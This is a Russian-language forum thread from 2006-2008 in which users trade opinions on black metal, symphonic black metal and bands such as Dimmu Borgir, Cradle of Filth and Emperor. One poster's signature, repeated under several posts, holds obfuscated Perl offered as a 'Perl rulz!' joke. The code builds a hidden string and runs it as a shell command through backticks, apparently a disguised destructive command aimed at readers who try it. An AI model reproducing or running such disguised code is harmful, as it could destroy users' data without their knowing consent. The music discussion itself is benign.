Добавлено: Ср Окт 25, 2006 5:54 pm Заголовок сообщения: Black Metal
У меня друг СОАД слушал, ну и меня конкретно посадил. Вот, а ещё слушал раньше Deep Purple, это перешло в Rammstein, затем Marilyn Manson, оттуда вытекло в Cradle of Filth и Dimmu Borgir и вообще люблю чёрнай метал. А вот Слипнот, Стонсоур, Статик-икс не люблю.
А выкак вообще на счёт симфо-блэка?
Lobzik
очень в тему, и так народа нет на форуме =(((
Disona
насчет симфо блэка конкретно не вслушивался, но против дартрона, бурзума и особенно эмперора ничо не имею))))) но только под настрой, ибо сутра до работы слушать ну никак не получается, один раз уже в автобусе заснул)))
ваще предпочитаю брутал-дэз)))) но это уже другая история
зы: тут раньше был стас-шадовлесс, он труЪ блэкер, но на меня обиделсо ссцуко такая и не заходит больше, и еще стэмина, тоже блекерша, но в инет очень редко выходит, соответственно на форум тем более _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
димму боргир вроде как симфо-блэк
крэдлы - вампирик-симфо или чтото наподобие я слышал по крайней мере
а под тру я имею ввиду ранние альбомы некоторых команд, которые и есть типа блэк без примесей))) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
вот именно поэтому идет разделение на "труЪ" и "все остальное" _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Чт Ноя 02, 2006 12:22 am Заголовок сообщения:
Не наю, я када Cannibal Corpse слушаю, на лахач пробивает страшно. И курить ниче не надо _________________ Все, чем ты гордишься, рано или поздно будет выброшено на помойку(с)
ваще, от немецкого lachen, в беларусском и украинском довольно часто немецкие слова встречаются _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Пн Янв 01, 2007 1:36 am Заголовок сообщения:
при том что немецкий _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Мар 11, 2007 2:22 pm Заголовок сообщения:
О, тут у Dimmu Borgir выходит новый альбум =))
In Sorte Diaboli - презентация 30 аперля, но я уже слушаю, качество правда не лучшее. Что мне нравится в Димму, так это присутствие симфонии. А вот rhh'lks остались без клавишника и тут конец =(.
Добавлено: Вс Мар 02, 2008 12:01 pm Заголовок сообщения:
Слушаю black смешанный с другими жанрами и симфо. Чистый не люблю.
Нравятся группы
Behemoth (death/black), Venom (Speed, thrash/black), Dimmu Borgir (Melodic sympho black), Emperor ( Sympho progressive black)
Добавлено: Вс Мар 02, 2008 4:23 pm Заголовок сообщения:
С уважением отношусь к классическим норвежским группам. Слушаю изредка mayhem, сотонюги или не отонюги а играют красиво.
Центрально- и восточноевропейская школа говорят не уступает, но для меня они уж слишком замогильные. настоящие секты.
Идеологию не разделяю
Последний раз редактировалось: molly (Вс Мар 02, 2008 8:20 pm), всего редактировалось 1 раз
Добавлено: Вс Мар 02, 2008 7:32 pm Заголовок сообщения:
Есть парочку неплохих песен у Кредлов и Боргеров,но вообще не люблю их..особенно раздрожают антихристианские клипы боргеров ,я не являюсь ярой христианкой,но клипы всеравно не люблю...и вообще мне на них (боргеров)иногда просто смешно смотреть _________________ "We accept her! We accept her! One of us! One of us! Gooble gobble, gooble gobble!"